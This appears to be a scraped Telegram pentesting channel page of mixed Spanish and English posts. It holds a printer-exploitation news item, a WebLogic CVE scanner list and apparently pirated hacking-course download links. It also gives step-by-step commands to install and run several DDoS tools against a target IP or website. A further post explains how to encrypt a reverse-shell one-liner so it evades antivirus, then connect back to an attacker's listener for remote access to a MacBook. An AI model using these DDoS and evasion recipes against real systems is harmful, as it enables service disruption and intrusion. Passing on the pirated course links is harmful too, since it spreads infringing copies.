Comunidad Pen7esting
3.58K subscribers
510 photos
40 videos
142 files
5.08K links
Download Telegram
Adios Rockyou.txt - Bienvenido Kaonashi.txt - https://t.co/DYG8Op5RiG
Noticias de seguridad informática
Cómo explotar las vulnerabilidades de una impresora para usarla como un servidor FTP anónimo

Muchas personas aún lo ignoran, pero es posible acceder a la información de dispositivos periféricos (principalmente escáneres e impresoras) a través de Internet. Suena muy mal, y puede ponerse aún peor, pues no siquiera se requieren conocimientos avanzados de hacking y seguridad informática para explotar este acceso vía puertos.

Los principales objetivos de
estos ataques son los dispositivos HP, presentes en millones de entornos
domésticos, empresariales y gubernamentales. Para cualquier usuario que sepa
dónde buscar, es increíblemente fácil encontrar algún software de código
abierto para cargar e interactuar con los discos duros de una impresora HP
mediante el puerto 9100. En la mayoría de los casos, los hackers sólo deben
cargar un archivo a la impresora y posteriormente ingresar http://<printer_ip_address/hp/device/<file_name
desde cualquier navegador web para acceder.

Este es un serio problema de
seguridad informática, pues al explotar este puerto se pueden desplegar muchas
otras actividades maliciosas, como la inyección de scripts maliciosos en la
impresora, lo que podría funcionar como etapa inicial de ataque. Además, las
impresoras pueden emplearse como repositorios para alojar contenido malicioso,
incluso ilícito, fuera del alcance de cualquier usuario legítimo o agencia de
la ley.

Hay dos principales razones por
las que los hackers recurren a esta clase de dispositivos. En primer lugar, es
necesario recordar que las impresoras se mantienen encendidas y en línea de
forma casi permanente, por lo que siguen alojando contenido incluso en estado
de suspensión o modo de ahorro de energía.

La segunda razón es el descuido o
poco interés de los administradores de estos equipos, pues son realmente
escasas las ocasiones en las que se detienen a revisar qué contenido está
alojado en las unidades de almacenamiento en las impresoras, sin olvidar que
nadie se toma el tiempo de habilitar el inicio de sesión para acceder a estos
dispositivos.

Aunque la divulgación pública de
las vulnerabilidades para las que no existen correcciones es una práctica
arriesgada, la comunidad de expertos en seguridad informática considera que
esta es una medida completamente válida para que todos los usuarios sean
consientes de los riesgos a los que están expuestos debido a estos dispositivos,
lo que al final podría resultar en la adopción de una postura proactiva de
frente a las amenazas de ciberseguridad.

En el caso particular de las
impresoras HP, los usuarios también podrían verificar que su dispositivo tenga
el puerto 9100 inhabilitado, lo que previene el acceso remoto.

El cargo Cómo explotar las vulnerabilidades de una impresora para usarla como un servidor FTP anónimo apareció primero en Noticias de seguridad informática.
weblogicScanner 漏洞扫描工具

CVE-2014-4210
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2017-3506
CVE-2017-10271
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
CVE-2018-3191
CVE-2018-3245
CVE-2018-3252
CVE-2019-2618
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890https://t.co/phKZBaMFih pic.twitter.com/ChD5exV1wi— Jin Wook Kim February 18, 2020
🎩 eLearnSecurity – Mobile Application Security and Penetration Testing (MASPT v2) 🎩


Syllabus
Section: Android

Module 1 : Android: Android Architectures
Module 2 : Android: Setting up a Testing Environment
Module 3 : Android: Android Build Process
Module 4 : Android: Reversing APKs
Module 5 : Android: Device Rooting
Module 6 : Android: Android Application Fundamentals
Module 7 : Android: Network Traffic
Module 8 : Android: Device and Data Security
Module 9 : Android: Tapjacking
Module 10 : Android: Static Code Analysis
Module 11 : Android: Dynamic Code Analysis

Section: iOS

Module 1 : iOS: iOS Architecture
Module 2 : iOS: Device Jailbreaking
Module 3 : iOS: Setting up a Testing Environment
Module 4 : iOS: iOS Build Process
Module 5 : iOS: Reversing iOS Apps
Module 6 : iOS: iOS Application Fundamentals
Module 7 : iOS: iOS Testing Fundamentals
Module 8 : iOS: Network Traffic
Module 9 : iOS: Device Administration
Module 10 : iOS: Dynamic Analysis

Download:

https://drive.google.com/drive/folders/1R9D5f38p6C9yUuO52YWrQxUdxEbktaT4





eLearnSecurity Hacking Courses
elearnsecurity courses:
1- Web Application Penetration Testing eXtreme (eWPTX )
6th2- Penetration Testing Professional (ePTPv3)
3- Web Application Penetration Testing (eWAPT v2)
https://mega.nz/#F!fqognSKY!cMa-JNPgLgTikrpI-JqMdQ


Cyber training 365
(many certificates include CHFI, CSAT, CSMD, CEH, CWAD, and more...)
https://mega.nz/?fbclid=IwAR3nWcT-uky4-zKGJ2jNRt_McQ7QXo-cBOF0GFlZJxuQLJjT6J4iH3obIvs#F!HGg2TCTA!CjyPNP3bktKV9w4_g2xUDg!aegwkYKS


50gb of hacking courses :
https://mega.nz/#F!7jIyBShb!5uQgMY-3UjZNCMrISP6ufQ


Pentester Academy 1
https://mega.nz/#F!BfBRECpZ!rwUAqCMPahV6e9oSs8twwQ
Pentester Academy 2
https://mega.nz/#F!7OIE2C5D!QMfFjVo6ipO1K7X_FhdOHg


Reverse engineering and Exploitation development
https://drive.google.com/file/d/0B5a4h0JxHNetNGtTRzBXT1Q4SlU/view


Offensive Security - Advanced Web Attacks and Exploitation [AWAE]
https://mega.nz/#F!pVYhhYbb!-zJK__ZypSgnnxoLFy2ICw


#Udemy - Practical #Ethical #Hacking - The Complete Course :-
#Download :- https://mega.nz/?fbclid=IwAR1f1T6jOdfQ01APTxTieVq2fCnckyH-FE6VTbOBEwzk9Op1fRHpAXrEt7M#F!n3RWzKYY!1xvBdLgoVxsNayNoxl7qQA


#Packt - #CompTIA #Security+ (SYO-501) course ...
#Download link :-
https://mega.nz/#F!DnZWBCYb!vAjXcKf90Pn3w5y4iPrdxg


#CompTIA #A+ full course:-
https://youtu.be/2eLe7uz-7CM


#CompTIA #Network+ full course:-
https://youtu.be/vrh0epPAC5wE6VTbOBEwzk9Op1fRHpAXrEt7M#F
《DDOS ATTACK》
●Lucita DDOS
$ apt update && apt upgrade
$ apt install python
$ apt install git
$ git clone https://github.com/zlucifer/lucita_ddos
$ cd lucita_ddos
$ chmod +x pukul.py
$ python pukul.py

●Ddos Attack (Trojan)
$ apt install git
$ apt install python
$ apt install bash
$ apt install toilet
$ apt install lolcat
$ git clone https://github.com/BPCATTACKER/DOS-TOOKITS
$ cd DOS-TOOKITS
$ chmod +x DOS-TOOKITS.sh
$ sh DoS-TOOKIT.sh

●Hammer
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ chmod +x hammer.py
$ python hammer.py
$ python3 hammer.py -s [IP target] -p [80] -t [135]

●Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80

●Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ chmod +x torshammer.oy
$ python2 torshammer.py

●LiteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ chmod +x liteDDOS.py
$ python2 liteDDOS.py
TESTED UNDETECTABLE MACOS PAYLOAD:
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.




1) Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn't found in your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.

2) git clone https://github.com/tokyoneon/Armor

3) cd Armor/

4) chmod +x armor.sh

5) ./armor.sh /path/to/payload.txt 1.2.3.4 443

6) The 1.2.3.4 address is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.

A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker's Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.

>Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an exmaple. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.
Web-Pentesting 2019 script:
>ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.


𝕀𝕟𝕤𝕥𝕒𝕝𝕝𝕚𝕤𝕒𝕥𝕚𝕠𝕟 & ℝ𝕦𝕟:

1) git clone https://github.com/penetrate2hack/ITWSV.git

2) cd ITWSV

3) chmod +x start.sh

4) chmod +x update.sh (only if required)

5) ./start.sh
MalwareBytes ha publicado un titular muy jugoso: por primera vez las amenazas en Mac superaron a las de PC en una proporción de nada menos que el doble en 2019. Muchas webs han multiplicado este gran titular.